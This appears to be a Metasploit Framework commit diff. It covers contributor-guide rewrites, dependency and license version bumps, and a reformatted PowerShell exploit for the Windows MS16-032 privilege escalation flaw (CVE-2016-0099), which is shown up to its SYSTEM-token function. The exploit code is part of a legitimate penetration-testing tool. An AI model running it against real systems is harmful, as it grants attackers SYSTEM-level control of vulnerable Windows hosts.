automatic module_metadata_base.json update

`expect.rb` is part of the `pty` extension to the Ruby stdlib since it
uses `select` and is meant for use with things like pipes or terminals
and Windows does not allow for selecting on those sorts of handles.
Since we only use it for sockets, we can pull it in straight to allow
for use on Windows without building the whole `pty` extension.

.mailmap

@@ -2,6 +2,7 @@ acammack-r7 <acammack-r7@github>       <acammack@aus-mbp-1099.aus.rapid7.com>
 acammack-r7 <acammack-r7@github>       <adam_cammack@rapid7.com>
 acammack-r7 <acammack-r7@github>       <Adam_Cammack@rapid7.com>
 adamgalway-r7 <adamgalway-r7@github>   <adam_galway@rapid7.com>
+adfoster-r7 <adfoster-r7@github>       <alandavid_foster@rapid7.com>
 bcook-r7 <bcook-r7@github>             <bcook@rapid7.com>
 bcook-r7 <bcook-r7@github>             <busterb@gmail.com>
 bturner-r7 <bturner-r7@github>         <brandon_turner@rapid7.com>

CONTRIBUTING.md

@@ -1,64 +1,66 @@
-# Hello, World!
-
-Thanks for your interest in making Metasploit -- and therefore, the
-world -- a better place!  Before you get started, review our
-[Code of Conduct].  There are multiple ways to help beyond just writing code:
- - [Submit bugs and feature requests] with detailed information about your issue or idea.
- - [Help fellow users with open issues] or [help fellow committers test recently submitted pull requests].
- - [Report a security vulnerability in Metasploit itself] to Rapid7.
- - Submit an updated or brand new module!  We are always eager for exploits, scanners, and new
-   integrations or features. Don't know where to start? Set up a [development environment], then head over to ExploitDB to look for [proof-of-concept exploits] that might make a good module.
-
 # Contributing to Metasploit
+Thank you for your interest in making Metasploit -- and therefore, the
+world -- a better place!  Before you get started, please review our [Code of Conduct](https://github.com/rapid7/metasploit-framework/wiki/Code-Of-Conduct). This helps us ensure our community is positive and supportive for everyone involved. 
+
+## Code Free Contributions 
+Before we get into the details of contributing code, you should know there are multiple ways you can add to Metasploit without any coding experience:
+
+ - You can [submit bugs and feature requests](https://github.com/rapid7/metasploit-framework/issues/new) with detailed information about your issue or idea: 
+ 	- If you'd like to propose a feature, describe what you'd like to see. Mock ups of console views would be great.
+ 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
+ - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed! 
+ - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality. 
+ - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!  
+ - [Add module documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation). New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand. 
 
-Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
-it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
-**will** be closed. Sorry!
 
 ## Code Contributions
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit). It will help you to get started and avoid some common mistakes.
 
-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.  
+
+Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
+will be closed. We need to ensure the code we're adding to master is written to a high standard.
+
+
+### Code Contribution Do's & Don'ts:
+--
+#### <u>Pull Requests</u>
+**Pull request [PR#9966] is a good example to follow.**
+
+* **Do** create a [topic branch] to work on instead of working directly on `master`. This helps to:
+	*  Protect the process.
+	* Ensures users are aware of commits on the branch being considered for merge.  
+	* Allows for a location for more commits to be offered without mingling with other contributor changes.
+	* Allows contributors to make progress while a PR is still being reviewed.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
-  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
-  allows for a location for more commits to be offered without mingling with other contributor changes,
-  and allows contributors to make progress while a PR is still being reviewed.
-
-
-### Pull Requests
-
 * **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output], especially for witnessable effects in `msfconsole`.
+* **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
 * **Don't** post questions in older closed PRs.
 
-Pull request [PR#9966] is a good example to follow.
-
-#### New Modules
-
+#### <u>New Modules</u>
+* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
 * **Do** use the many module mixin [API]s.
-* **Don't** include more than one module per pull request.
 * **Do** include instructions on how to setup the vulnerable environment or software.
 * **Do** include [Module Documentation] showing sample run-throughs.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
-  anything "serious" can be done with post modules and local exploits.
-
-#### Library Code
+* **Don't** include more than one module per pull request.
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and anything "serious" can be done with post modules and local exploits.
 
+#### <u>Library Code</u>
 * **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.
 
-#### Bug Fixes
-
+#### <u>Bug Fixes</u>
 * **Do** include reproduction steps in the form of verification steps.
 * **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.
 
@@ -99,8 +101,8 @@ curve, so keep it up!
 [Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
-[Better Specs]:http://betterspecs.org
+[Better Specs]:http://www.betterspecs.org/
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4

COPYING

@@ -1,4 +1,4 @@
-Copyright (C) 2006-2018, Rapid7, Inc.
+Copyright (C) 2006-2020, Rapid7, Inc.
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without modification,

Gemfile.lock

@@ -1,7 +1,7 @@
 PATH
   remote: .
   specs:
-    metasploit-framework (5.0.69)
+    metasploit-framework (5.0.76)
       actionpack (~> 4.2.6)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -23,11 +23,11 @@ PATH
       jsobfu
       json
       metasm
-      metasploit-concern
-      metasploit-credential
-      metasploit-model
-      metasploit-payloads (= 1.3.83)
-      metasploit_data_models (= 3.0.10)
+      metasploit-concern (~> 2.0.0)
+      metasploit-credential (~> 3.0.0)
+      metasploit-model (~> 2.0.4)
+      metasploit-payloads (= 1.3.84)
+      metasploit_data_models (~> 3.0.10)
       metasploit_payloads-mettle (= 0.5.16)
       mqtt
       msgpack
@@ -117,22 +117,22 @@ GEM
     arel-helpers (2.11.0)
       activerecord (>= 3.1.0, < 7)
     aws-eventstream (1.0.3)
-    aws-partitions (1.262.0)
-    aws-sdk-core (3.86.0)
+    aws-partitions (1.274.0)
+    aws-sdk-core (3.90.1)
       aws-eventstream (~> 1.0, >= 1.0.2)
       aws-partitions (~> 1, >= 1.239.0)
       aws-sigv4 (~> 1.1)
       jmespath (~> 1.0)
-    aws-sdk-ec2 (1.130.0)
+    aws-sdk-ec2 (1.144.0)
       aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.32.0)
+    aws-sdk-iam (1.33.0)
       aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.27.0)
+    aws-sdk-kms (1.29.0)
       aws-sdk-core (~> 3, >= 3.71.0)
       aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.60.1)
+    aws-sdk-s3 (1.60.2)
       aws-sdk-core (~> 3, >= 3.83.0)
       aws-sdk-kms (~> 1)
       aws-sigv4 (~> 1.1)
@@ -146,7 +146,7 @@ GEM
     coderay (1.1.2)
     concurrent-ruby (1.0.5)
     cookiejar (0.3.3)
-    crass (1.0.5)
+    crass (1.0.6)
     daemons (1.3.1)
     diff-lcs (1.3)
     dnsruby (1.61.3)
@@ -207,7 +207,7 @@ GEM
       activemodel (~> 4.2.6)
       activesupport (~> 4.2.6)
       railties (~> 4.2.6)
-    metasploit-payloads (1.3.83)
+    metasploit-payloads (1.3.84)
     metasploit_data_models (3.0.10)
       activerecord (~> 4.2.6)
       activesupport (~> 4.2.6)
@@ -221,17 +221,17 @@ GEM
     metasploit_payloads-mettle (0.5.16)
     method_source (0.9.2)
     mini_portile2 (2.4.0)
-    minitest (5.13.0)
+    minitest (5.14.0)
     mqtt (0.5.0)
-    msgpack (1.3.1)
+    msgpack (1.3.3)
     multipart-post (2.1.1)
     nessus_rest (0.1.6)
     net-ssh (5.2.0)
     network_interface (0.0.2)
     nexpose (7.2.1)
-    nokogiri (1.10.7)
+    nokogiri (1.10.8)
       mini_portile2 (~> 2.4.0)
-    octokit (4.15.0)
+    octokit (4.16.0)
       faraday (>= 0.9)
       sawyer (~> 0.8.0, >= 0.5.3)
     openssl-ccm (1.2.2)
@@ -256,7 +256,7 @@ GEM
       coderay (~> 1.1.0)
       method_source (~> 0.9.0)
     public_suffix (4.0.3)
-    rack (1.6.12)
+    rack (1.6.13)
     rack-protection (1.5.5)
       rack
     rack-test (0.6.3)
@@ -292,7 +292,7 @@ GEM
       metasm
       rex-arch
       rex-text
-    rex-exploitation (0.1.21)
+    rex-exploitation (0.1.22)
       jsobfu
       metasm
       rex-arch
@@ -305,7 +305,7 @@ GEM
       rex-arch
     rex-ole (0.1.6)
       rex-text
-    rex-powershell (0.1.83)
+    rex-powershell (0.1.86)
       rex-random_identifier
       rex-text
     rex-random_identifier (0.1.4)
@@ -356,15 +356,14 @@ GEM
       rubyntlm
       windows_error
     rubyntlm (0.6.2)
-    rubyzip (2.0.0)
+    rubyzip (2.2.0)
     sawyer (0.8.2)
       addressable (>= 2.3.5)
       faraday (> 0.8, < 2.0)
-    simplecov (0.17.1)
+    simplecov (0.18.2)
       docile (~> 1.1)
-      json (>= 1.8, < 3)
-      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.2)
+      simplecov-html (~> 0.11)
+    simplecov-html (0.12.0)
     sinatra (1.4.8)
       rack (~> 1.5)
       rack-protection (~> 1.4)
@@ -380,7 +379,7 @@ GEM
     thread_safe (0.3.6)
     tilt (2.0.10)
     timecop (0.9.1)
-    ttfunk (1.6.1)
+    ttfunk (1.6.2.1)
     tzinfo (1.2.6)
       thread_safe (~> 0.1)
     tzinfo-data (1.2019.3)

LICENSE

@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/
 
 Files: *
-Copyright: 2006-2018, Rapid7, Inc.
+Copyright: 2006-2020, Rapid7, Inc.
 License: BSD-3-clause
 
 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -71,6 +71,10 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT
 
+Files: lib/expect.rb
+Copyright: 2017 Yukihiro Matsumoto
+License: Ruby
+
 Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0

LICENSE_GEMS

@@ -10,12 +10,12 @@ afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.11.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.262.0, "Apache 2.0"
-aws-sdk-core, 3.86.0, "Apache 2.0"
-aws-sdk-ec2, 1.130.0, "Apache 2.0"
-aws-sdk-iam, 1.32.0, "Apache 2.0"
-aws-sdk-kms, 1.27.0, "Apache 2.0"
-aws-sdk-s3, 1.60.1, "Apache 2.0"
+aws-partitions, 1.274.0, "Apache 2.0"
+aws-sdk-core, 3.90.1, "Apache 2.0"
+aws-sdk-ec2, 1.144.0, "Apache 2.0"
+aws-sdk-iam, 1.33.0, "Apache 2.0"
+aws-sdk-kms, 1.29.0, "Apache 2.0"
+aws-sdk-s3, 1.60.2, "Apache 2.0"
 aws-sigv4, 1.1.0, "Apache 2.0"
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
@@ -26,16 +26,16 @@ bundler, 1.17.3, MIT
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
-crass, 1.0.5, MIT
+crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
-diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
+diff-lcs, 1.3, "Artistic-2.0, GPL-2.0+, MIT"
 dnsruby, 1.61.3, "Apache 2.0"
 docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
 em-http-request, 1.1.5, MIT
 em-socksify, 0.3.2, MIT
 erubis, 2.7.0, MIT
-eventmachine, 1.2.7, "ruby, GPL-2.0"
+eventmachine, 1.2.7, "GPL-2.0, ruby"
 factory_bot, 5.1.1, MIT
 factory_bot_rails, 5.1.1, MIT
 faker, 2.2.1, MIT
@@ -53,23 +53,23 @@ loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.4, "New BSD"
-metasploit-framework, 5.0.69, "New BSD"
+metasploit-framework, 5.0.76, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.83, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.84, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
 metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.13.0, MIT
+minitest, 5.14.0, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.3.1, "Apache 2.0"
+msgpack, 1.3.3, "Apache 2.0"
 multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
 net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
-nokogiri, 1.10.7, MIT
-octokit, 4.15.0, MIT
+nokogiri, 1.10.8, MIT
+octokit, 4.16.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
@@ -81,7 +81,7 @@ pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
 public_suffix, 4.0.3, MIT
-rack, 1.6.12, MIT
+rack, 1.6.13, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
@@ -96,12 +96,12 @@ rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.21, "New BSD"
+rex-exploitation, 0.1.22, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.83, "New BSD"
+rex-powershell, 0.1.86, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
@@ -122,10 +122,10 @@ ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 2.0.0, "Simplified BSD"
+rubyzip, 2.2.0, "Simplified BSD"
 sawyer, 0.8.2, MIT
-simplecov, 0.17.1, MIT
-simplecov-html, 0.10.2, MIT
+simplecov, 0.18.2, MIT
+simplecov-html, 0.12.0, MIT
 sinatra, 1.4.8, MIT
 sqlite3, 1.3.13, "New BSD"
 sshkey, 2.0.0, MIT
@@ -135,7 +135,7 @@ thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
-ttfunk, 1.6.1, "Nonstandard, GPL-2.0, GPL-3.0"
+ttfunk, 1.6.2.1, "GPL-2.0, GPL-3.0, Nonstandard"
 tzinfo, 1.2.6, MIT
 tzinfo-data, 1.2019.3, MIT
 warden, 1.2.7, MIT

data/exploits/CVE-2016-0099/cve_2016_0099.ps1

@@ -1,347 +1,371 @@
-# Copyright (c) 2016, Ruben Booren (@FuzzySec)
-# All rights reserved
-Add-Type -TypeDefinition @"
-    using System;
-    using System.Diagnostics;
-    using System.Runtime.InteropServices;
-    using System.Security.Principal;
+#function Invoke-MS16-032 {
+<#
+.SYNOPSIS
+    
+    PowerShell implementation of MS16-032. The exploit targets all vulnerable
+    operating systems that support PowerShell v2+. Credit for the discovery of
+    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
+    
+    Targets:
+    
+    * Win7-Win10 & 2k8-2k12 <== 32/64 bit!
+    * Tested on x32 Win7, x64 Win8, x64 2k12R2
+    
+    Notes:
+    
+    * In order for the race condition to succeed the machine must have 2+ CPU
+      cores. If testing in a VM just make sure to add a core if needed mkay.
+    * Want to know more about MS16-032 ==>
+      https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html
 
-    [StructLayout(LayoutKind.Sequential)]
-    public struct PROCESS_INFORMATION
-    {
-        public IntPtr hProcess;
-        public IntPtr hThread;
-        public int dwProcessId;
-        public int dwThreadId;
-    }
-
-    [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
-    public struct STARTUPINFO
-    {
-        public Int32 cb;
-        public string lpReserved;
-        public string lpDesktop;
-        public string lpTitle;
-        public Int32 dwX;
-        public Int32 dwY;
-        public Int32 dwXSize;
-        public Int32 dwYSize;
-        public Int32 dwXCountChars;
-        public Int32 dwYCountChars;
-        public Int32 dwFillAttribute;
-        public Int32 dwFlags;
-        public Int16 wShowWindow;
-        public Int16 cbReserved2;
-        public IntPtr lpReserved2;
-        public IntPtr hStdInput;
-        public IntPtr hStdOutput;
-        public IntPtr hStdError;
-    }
-
-    [StructLayout(LayoutKind.Sequential)]
-    public struct SQOS
-    {
-        public int Length;
-        public int ImpersonationLevel;
-        public int ContextTrackingMode;
-        public bool EffectiveOnly;
-    }
-
-    public static class Advapi32
-    {
-        [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
-        public static extern bool CreateProcessWithLogonW(
-            String userName,
-            String domain,
-            String password,
-            int logonFlags,
-            String applicationName,
-            String commandLine,
-            int creationFlags,
-            int environment,
-            String currentDirectory,
-            ref  STARTUPINFO startupInfo,
-            out PROCESS_INFORMATION processInformation);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool SetThreadToken(
-            ref IntPtr Thread,
-            IntPtr Token);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenThreadToken(
-            IntPtr ThreadHandle,
-            int DesiredAccess,
-            bool OpenAsSelf,
-            out IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public static extern bool OpenProcessToken(
-            IntPtr ProcessHandle,
-            int DesiredAccess,
-            ref IntPtr TokenHandle);
-
-        [DllImport("advapi32.dll", SetLastError=true)]
-        public extern static bool DuplicateToken(
-            IntPtr ExistingTokenHandle,
-            int SECURITY_IMPERSONATION_LEVEL,
-            ref IntPtr DuplicateTokenHandle);
-    }
-
-    public static class Kernel32
-    {
-        [DllImport("kernel32.dll")]
-        public static extern uint GetLastError();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentProcess();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern IntPtr GetCurrentThread();
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern int GetThreadId(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError = true)]
-        public static extern int GetProcessIdOfThread(IntPtr handle);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int SuspendThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll",SetLastError=true)]
-        public static extern int ResumeThread(IntPtr hThread);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool TerminateProcess(
-            IntPtr hProcess,
-            uint uExitCode);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool CloseHandle(IntPtr hObject);
-
-        [DllImport("kernel32.dll", SetLastError=true)]
-        public static extern bool DuplicateHandle(
-            IntPtr hSourceProcessHandle,
-            IntPtr hSourceHandle,
-            IntPtr hTargetProcessHandle,
-            ref IntPtr lpTargetHandle,
-            int dwDesiredAccess,
-            bool bInheritHandle,
-            int dwOptions);
-    }
-
-    public static class Ntdll
-    {
-        [DllImport("ntdll.dll", SetLastError=true)]
-        public static extern int NtImpersonateThread(
-            IntPtr ThreadHandle,
-            IntPtr ThreadToImpersonate,
-            ref SQOS SecurityQualityOfService);
-    }
+.DESCRIPTION
+	Author: Ruben Boonen (@FuzzySec)
+	Blog: http://www.fuzzysecurity.com/
+	License: BSD 3-Clause
+	Required Dependencies: PowerShell v2+
+	Optional Dependencies: None
+    
+.EXAMPLE
+	C:\PS> Invoke-MS16-032
+#>
+	Add-Type -TypeDefinition @"
+	using System;
+	using System.Diagnostics;
+	using System.Runtime.InteropServices;
+	using System.Security.Principal;
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct PROCESS_INFORMATION
+	{
+		public IntPtr hProcess;
+		public IntPtr hThread;
+		public int dwProcessId;
+		public int dwThreadId;
+	}
+	
+	[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]
+	public struct STARTUPINFO
+	{
+		public Int32 cb;
+		public string lpReserved;
+		public string lpDesktop;
+		public string lpTitle;
+		public Int32 dwX;
+		public Int32 dwY;
+		public Int32 dwXSize;
+		public Int32 dwYSize;
+		public Int32 dwXCountChars;
+		public Int32 dwYCountChars;
+		public Int32 dwFillAttribute;
+		public Int32 dwFlags;
+		public Int16 wShowWindow;
+		public Int16 cbReserved2;
+		public IntPtr lpReserved2;
+		public IntPtr hStdInput;
+		public IntPtr hStdOutput;
+		public IntPtr hStdError;
+	}
+	
+	[StructLayout(LayoutKind.Sequential)]
+	public struct SQOS
+	{
+		public int Length;
+		public int ImpersonationLevel;
+		public int ContextTrackingMode;
+		public bool EffectiveOnly;
+	}
+	
+	public static class Advapi32
+	{
+		[DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
+		public static extern bool CreateProcessWithLogonW(
+			String userName,
+			String domain,
+			String password,
+			int logonFlags,
+			String applicationName,
+			String commandLine,
+			int creationFlags,
+			int environment,
+			String currentDirectory,
+			ref  STARTUPINFO startupInfo,
+			out PROCESS_INFORMATION processInformation);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool SetThreadToken(
+			ref IntPtr Thread,
+			IntPtr Token);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenThreadToken(
+			IntPtr ThreadHandle,
+			int DesiredAccess,
+			bool OpenAsSelf,
+			out IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public static extern bool OpenProcessToken(
+			IntPtr ProcessHandle, 
+			int DesiredAccess,
+			ref IntPtr TokenHandle);
+			
+		[DllImport("advapi32.dll", SetLastError=true)]
+		public extern static bool DuplicateToken(
+			IntPtr ExistingTokenHandle,
+			int SECURITY_IMPERSONATION_LEVEL,
+			ref IntPtr DuplicateTokenHandle);
+	}
+	
+	public static class Kernel32
+	{
+		[DllImport("kernel32.dll")]
+		public static extern uint GetLastError();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentProcess();
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern IntPtr GetCurrentThread();
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern int GetThreadId(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError = true)]
+		public static extern int GetProcessIdOfThread(IntPtr handle);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int SuspendThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll",SetLastError=true)]
+		public static extern int ResumeThread(IntPtr hThread);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool TerminateProcess(
+			IntPtr hProcess,
+			uint uExitCode);
+	
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool CloseHandle(IntPtr hObject);
+		
+		[DllImport("kernel32.dll", SetLastError=true)]
+		public static extern bool DuplicateHandle(
+			IntPtr hSourceProcessHandle,
+			IntPtr hSourceHandle,
+			IntPtr hTargetProcessHandle,
+			ref IntPtr lpTargetHandle,
+			int dwDesiredAccess,
+			bool bInheritHandle,
+			int dwOptions);
+	}
+	
+	public static class Ntdll
+	{
+		[DllImport("ntdll.dll", SetLastError=true)]
+		public static extern int NtImpersonateThread(
+			IntPtr ThreadHandle,
+			IntPtr ThreadToImpersonate,
+			ref SQOS SecurityQualityOfService);
+	}
 "@
+	
+	function Get-ThreadHandle {
+		# StartupInfo Struct
+		$StartupInfo = New-Object STARTUPINFO
+		$StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
+		$StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
+		$StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
+		$StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		
+		# ProcessInfo Struct
+		$ProcessInfo = New-Object PROCESS_INFORMATION
+		
+		# CreateProcessWithLogonW --> lpCurrentDirectory
+		$GetCurrentPath = (Get-Item -Path ".\" -ErrorAction SilentlyContinue -Verbose).FullName
 
-    function Get-ThreadHandle {
-        # StartupInfo Struct
-        $StartupInfo = New-Object STARTUPINFO
-        $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES
-        $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread()
-        $StartupInfo.hStdError = [Kernel32]::GetCurrentThread()
-        $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size
+		# LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
+		$CallResult = [Advapi32]::CreateProcessWithLogonW(
+			"user", "domain", "pass",
+			0x00000002, "C:\Windows\System32\cmd.exe", "",
+			0x00000004, $null, $GetCurrentPath,
+			[ref]$StartupInfo, [ref]$ProcessInfo)
 
-        # ProcessInfo Struct
-        $ProcessInfo = New-Object PROCESS_INFORMATION
+		# Duplicate handle into current process -> DUPLICATE_SAME_ACCESS
+		$lpTargetHandle = [IntPtr]::Zero
+		$CallResult = [Kernel32]::DuplicateHandle(
+			$ProcessInfo.hProcess, 0x4,
+			[Kernel32]::GetCurrentProcess(),
+			[ref]$lpTargetHandle, 0, $false,
+			0x00000002)
+		
+		# Clean up suspended process
+		$CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess)
+		$CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread)
+		
+		$lpTargetHandle
+	}
+	
+	function Get-SystemToken {
+		echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)"
+	
+		$CallResult = [Kernel32]::SuspendThread($hThread)
+		if ($CallResult -ne 0) {
+			echo "[!] $hThread is a bad thread, exiting.."
+			Return
+		} echo "[+] Thread suspended"
+		
+		echo "[>] Wiping current impersonation token"
+		$CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero)
+		if (!$CallResult) {
+			echo "[!] SetThreadToken failed, exiting.."
+			$CallResult = [Kernel32]::ResumeThread($hThread)
+			echo "[+] Thread resumed!"
+			Return
+		}
+		
+		echo "[>] Building SYSTEM impersonation token"
+		# SecurityQualityOfService struct
